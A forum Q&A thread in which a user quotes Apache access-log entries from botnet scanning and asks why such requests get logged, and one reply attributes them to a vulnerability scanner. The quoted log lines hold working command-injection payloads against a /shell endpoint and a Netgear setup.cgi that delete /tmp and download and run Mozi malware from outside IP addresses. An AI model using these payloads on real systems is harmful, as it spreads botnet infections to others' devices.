Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
G
G
GogenZZo2021-05-31 11:05:00
Apache HTTP Server
GogenZZo, 2021-05-31 11:05:00

How to leave a trace in Apache logs?

Hello. I look at the Apache logs, someone is trying to upload a file, and unfortunately they succeeded. There are entries like this
"GET /shell?cd+/tmp;rm+-rf+*;wget+ 117.221.178.19:40872/Mozi.a;chmod+777+Mozi.a;/tmp/... HTTP/1.0" 404 1723 "- " "Hello, world"
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+ 178.175.88.132:39452/Mozi.m+-O+/tmp/netgear;sh+net. .. HTTP/1.0" 500 1711 "-" "-"

No matter how I tried, through the domain, or by ip address, contact the same way, but the browser just says 404. I also tried to make a request directly through telnet. And there is nothing in the logs. How do they make such a request that Apache writes it to the log?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

1 answer(s)
Report
V
Vladimir Korotenko, 2021-05-31
@firedragon

Someone scans your web server, the web server says that there is no such file, and the second time it gives an error. And such a result can be obtained by running any vulnerability scanner on your address

Similar questions
T
Test Test2016-03-25 14:50:26
How to make Apache or Yii return 404 without 301? 2Reply
P
pvl882016-03-27 21:30:28
How to make a site work in TOR? 1Reply
G
gfan2014-01-06 01:46:53
Need an analogue of Denwer 6Reply
S
Stepan2020-07-29 20:53:11
Why does a Permission denied error occur when deleting a PHP file? 2Reply
N
nazandr2016-03-28 20:11:50
apache error Forbidden You don't have permission to access / on this server? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question